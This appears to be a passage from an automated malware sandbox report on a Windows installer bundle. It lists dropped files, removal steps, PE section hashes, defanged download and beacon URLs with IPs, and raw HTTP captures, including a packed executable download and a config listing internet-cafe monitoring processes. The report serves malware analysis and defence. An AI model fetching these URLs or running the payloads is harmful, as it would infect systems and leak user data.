%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RAV\cloudwork.dll (7726 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (1384 bytes)
%Program Files%\Rising\RAV\defmon.dll (3361 bytes)
%Program Files%\Rising\RAV\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
C:\rising.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\uprsmon.dat (45 bytes)
%Program Files%\Rising\RAV\cloudnet.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (57324 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAV936.xml (515 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\pngdll.dll (1425 bytes)
%Program Files%\Rising\RAV\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RAV\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RAV\XMLS\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RAV\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RAV\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (168 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RAV\XMLS\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1403380.exe.log (314853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (2065 bytes)
%Program Files%\Rising\RAV\XMLS\RAVXP.xml (404 bytes)
%Program Files%\Rising\RAV\XMLS\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (6605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Program Files%\Rising\RAV\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Program Files%\Rising\RAV\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (608 bytes)
%Program Files%\Rising\RAV\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (1000 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%System%\drivers\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (1202 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\xID.dll (3 bytes)
C:\setup_a1474.exe (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\3.dll (18791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\desktop.ini (67 bytes)
C:\SinaInstall_567015.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\desktop.ini (67 bytes)
C:\MM-liao8327.exe (6359 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.cloudwork.log (6073 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.log (149 bytes)
%Program Files%\Rising\RAV\browserruncount.dat (944 bytes)
%Program Files%\Rising\RAV\prvcloudcfg.ini (26 bytes)
%Program Files%\Rising\RAV\ravmond.exe_status.ini (80 bytes)
%Program Files%\Rising\RAV\CCenter.db-journal (18630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SinaInstall_567015.exe (15506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_01.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\core[1].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_02.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (1804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\skinconfig.ini (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\pop_bg.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.0551fs[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_03.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller_prompt.ini (375 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (2705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\cancel_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\LZMA.dll (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\z_stat[1].php (1097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller.ini (939 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\unrar.dll (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_02.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\install_begin[1].htm (329 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\img[1].png (135828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\img.rar (82437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_kprd7_93.xml (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\go.png (196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_5.tmp_0 (631 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23096 | 23552 | 4.43854 | 092e164daa50385128d3c5b319373035 |
| .rdata | 28672 | 4496 | 4608 | 3.59023 | 4e7f519777030dd2f0ea0d2092babed3 |
| .data | 36864 | 110424 | 1024 | 3.20088 | f6d93c048bf148a2daee8a6b0505e38b |
| .ndata | 147456 | 57344 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 204800 | 79072 | 79360 | 5.29506 | ee9b0c553d201ddeb1acb5af9774b9c6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://1st.dl.glb0.lxdns.com/dl/qdtg/install1403380.exe | |
| hxxp://bgp8.yandui.com/xlxc/img/567015/img.png | |
| hxxp://bgp8.yandui.com/Public/config/xlxc/install_begin.html?567015 | |
| hxxp://bgp8.yandui.com/Public/conf/open/1/35_1_0_1_1/10.jpg | |
| hxxp://bgp8.yandui.com/Public/conf/open/1/35_1_0_1_1/11.jpg | |
| hxxp://bgp8.yandui.com/Public/conf/c-lock/2/35_1_0_1_1/567015.xml | |
| hxxp://bgp8.yandui.com/Public/conf/cpa/2/35_1_0_1_1/567015.xml | |
| hxxp://bgp8.yandui.com/Public/conf/cybercafe_check/index.xml | |
| hxxp://bgp8.yandui.com/Public/conf/resource_donum.xml | |
| hxxp://bgp8.yandui.com/Public/conf/homepage/2/35_1_0_1_1/567015.xml | |
| hxxp://bgp8.yandui.com/Public/conf/icon/2/35_1_0_1_1/567015.xml | |
| hxxp://all.cnzz.com.danuoyi.tbcache.com/z_stat.php?id=1255160857 | |
| hxxp://oz.cnzz.com/stat.htm?id=1255160857&r=&lg=en-us&ntime=none&cnzz_eid=336905316-1436411426-&showp=1916x902&t=&h=1&rnd=1494402114 | 198.11.132.200 |
| hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1255160857&t=z | |
| hxxp://z.rising.com.cn/urg.asp?v=ravbase&t=rav&a= | |
| hxxp://z.rising.com.cn/register/minicenter/e/c.aspx | |
| hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=577236194 | 42.120.219.171 |
| hxxp://cnzz.mmstat.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 | 42.120.219.171 |
| hxxp://z.rising.com.cn/LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | |
| hxxp://z.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | |
| hxxp://data1.iruixing.com/irg.ashx?d= | 101.254.23.28 |
| hxxp://data1.iruixing.com/irg.ashx?d=UEgnFnp/FHMXDgsCJzdSZntxEnAQCAoAUkNXYHx5EnAQCAIBVUNXY3d5GnsRDBcAUV1QY2F5GXsTAwIEWEpRZH19E3txeW8= | 101.254.23.28 |
| hxxp://z.rising.com.cn/rs2012/RsPcVer12.xml | |
| hxxp://cloud.rising.com.cn/productstat/productStat.aspx?info=JVD5Mt0GKRdfSg9YaENEWhsAMAENEk0ROAINYj06CjFzBRgLZCIDYlkwEkh7EztVFyEdb1sgHzZlDi0tbFYAE00TPBcNEV9LaVUeF1hLaV0WVQIXLwBCHllRd1UBDV9Ud1wDBQQWZFUWSwQWLVhzZV5TbFYEFVlXHyEGFV9dalUDE1hValUDE1hValUDE00EOhFZTAUMPVgBF1tWal0ABQcENwINEllQa0NTTw8ELQANBRgROBFVHltDMBUNBRgLBhVCSh0MNQBXRlZUbkNDTTQVKwpeQgYAZFQABRgLBhVCTB8cKQANEU0WNzpRUQ4EZFUWUAU6OglZRgURNxBdHlpDKgtvTwIIMBENFk0HMAJFUw8ELQANE4k= | 211.103.159.105 |
| hxxp://config.0551fs.com/Public/conf/open/1/35_1_0_1_1/11.jpg | 61.147.111.59 |
| hxxp://down.0551fs.com/xlxc/img/567015/img.png | 61.147.111.59 |
| hxxp://rsup10.rising.com.cn/register/minicenter/e/c.aspx | 1.122.192.19 |
| hxxp://c.cnzz.com/core.php?web_id=1255160857&t=z | 195.27.31.246 |
| hxxp://center.rising.com.cn/urg.asp?v=ravbase&t=rav&a= | 1.122.192.19 |
| hxxp://dl.ikiki.cn/dl/qdtg/install1403380.exe | 171.107.186.80 |
| hxxp://config.0551fs.com/Public/conf/open/1/35_1_0_1_1/10.jpg | 61.147.111.59 |
| hxxp://rsup10.rising.com.cn/rs2012/RsPcVer12.xml | 1.122.192.19 |
| hxxp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | 1.122.192.19 |
| hxxp://config.0551fs.com/Public/conf/cpa/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
| hxxp://s11.cnzz.com/z_stat.php?id=1255160857 | 1.99.192.16 |
| hxxp://config.0551fs.com/Public/conf/c-lock/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
| hxxp://config.0551fs.com/Public/conf/homepage/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
| hxxp://center.rising.com.cn/LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | 1.122.192.19 |
| hxxp://config.0551fs.com/Public/conf/icon/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
| hxxp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015 | 61.147.111.59 |
| hxxp://pcookie.cnzz.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 | 42.120.219.171 |
| hxxp://config.0551fs.com/Public/conf/resource_donum.xml | 61.147.111.59 |
| hxxp://config.0551fs.com/Public/conf/cybercafe_check/index.xml | 61.147.111.59 |
| down.llhan.com | 222.186.129.20 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /9.gif?abc=1&rnd=577236194 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 09 Jul 2015 03:10:30 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=7288e500; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=20b8ee1ffd2faf9203e2e2d3_1436411430; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server: Tengine..Date: Thu, 09 Jul 2015 03:10:30 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.mmstat.com..Set-Cookie: sca=7288e500; path=/; domain=.cnzz.mmstat.com..Set-Cookie: atpsida=20b8ee1ffd2faf9203e2e2d3_1436411430; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.cnzz.mmstat.com..Location: http://pcookie.cnzz.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;..
GET /dl/qdtg/install1403380.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: dl.ikiki.cn
Cache-Control: no-cache
HTTP/1.0 200 OK
Date: Wed, 08 Jul 2015 04:55:38 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 07 Jul 2015 12:29:24 GMT
Accept-Ranges: bytes
ETag: "3051f8fb0b8d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 4786008
Age: 80058
Via: 1.0 jxjj35:80 (Cdn Cache Server V2.0), 1.0 nanning15:8101 (Cdn Cache Server V2.0)
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............m.......d.....1.......<.R.....<.P.......P.....E...........B...1.m.....1.R.#...S.S.....1.W.....Rich............PE..L....i.T.....................0......`.............@........................... .......I.........................................D........'..........8.H. ...........................................P...H...........................................UPX0....................................UPX1................................@....rsrc....0.......*..................@..............................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!.....uX..._.....Y...8`Q.&.....d.:Mw....Uo....9dU..gSbCw..}.t...(g..R\.rGo.L.*.....A.}..I....*>..0-..".e."2..nO.....(.M...B..._...8.......*f........Z.W;E,.....A.......p.y...,H..|.O ..Gr....J....8..........Q\.2......A..................Cl.......&^o....9...S.=..y...{jd......~...c.....XF^h..z./.,.<....{.....c..\.......Z...D0Z..4O".......%.x...2.W..*..K .$*..VO...../...{X...J...>c*...H]....CC.;(P.Gn .....lb..G.mN..K%Gs..yK....e...d....n../6.......\..:..~qn{..././...~-..R....\..W*CK...r...7L...?L..s......?R...p..y.....Nv.Vr.u.
<<< skipped >>>
GET /Public/conf/homepage/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 09 Jul 2015 03:10:20 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 404 Not Found..Server: nginx..Date: Thu, 09 Jul 2015 03:10:20 GMT..Content-Type: text/html..Content-Length: 564..Connection: keep-alive..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
<<< skipped >>>
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:17 GMT
Content-Type: text/xml
Content-Length: 633
Last-Modified: Wed, 24 Sep 2014 06:14:22 GMT
Connection: keep-alive
ETag: "5422613e-279"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
<?xml version="1.0" encoding="utf-8"?>.<root>.<!-- .................. -->..<reg>...<item></item>...<item></item>..</reg>.<!-- ..................... -->..<icon>...<item>............</item>...<item>.........</item>...<item>iKeeper</item>...<item>............</item>...<item>......</item>...<item>............</item>...</icon>.<!-- ............... -->..<process>...<item>ikeeper.exe</item>...<item>DbntCli.exe</item>...<item>.............exe</item>...<item>BarClientView.exe</item>...<item>lock.exe</item>...<item>BarMonitor.exe</item>...<item>DF5Serv.exe</item>...<item>PBSClient.exe</item>...<item>Clsmn.exe</item>..</process>.</root>HTTP/1.1 200 OK..Server: nginx..Date: Thu, 09 Jul 2015 03:10:17 GMT..Content-Type: text/xml..Content-Length: 633..Last-Modified: Wed, 24 Sep 2014 06:14:22 GMT..Connection: keep-alive..ETag: "5422613e-279"..X-Server-IP: 61.147.111.59..Accept-Ranges: bytes..<?xml version="1.0" encoding="utf-8"?>.<root>.<!-- .................. -->..<reg>...<item></item>...<item></item>..</reg>.<!-- ..................... -->..<icon>...<item>............</item>...<item>.........</item>...<item>iKeeper</item>...<item>............</it
<<< skipped >>>
GET /irg.ashx?d= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: data1.iruixing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:42 GMT
Content-Length: 0
....
GET /irg.ashx?d=UEgnFnp/FHMXDgsCJzdSZntxEnAQCAoAUkNXYHx5EnAQCAIBVUNXY3d5GnsRDBcAUV1QY2F5GXsTAwIEWEpRZH19E3txeW8= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: data1.iruixing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:42 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-AspNet-Version: 2.0.50727..X-Powered-By: ASP.NET..Date: Thu, 09 Jul 2015 03:10:42 GMT..Content-Length: 0..
GET /xlxc/img/567015/img.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.0551fs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:09:59 GMT
Content-Type: image/png
Content-Length: 775012
Last-Modified: Tue, 02 Jun 2015 05:47:08 GMT
Connection: keep-alive
ETag: "556d435c-bd364"
Expires: Thu, 16 Jul 2015 03:09:59 GMT
Cache-Control: max-age=604800
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
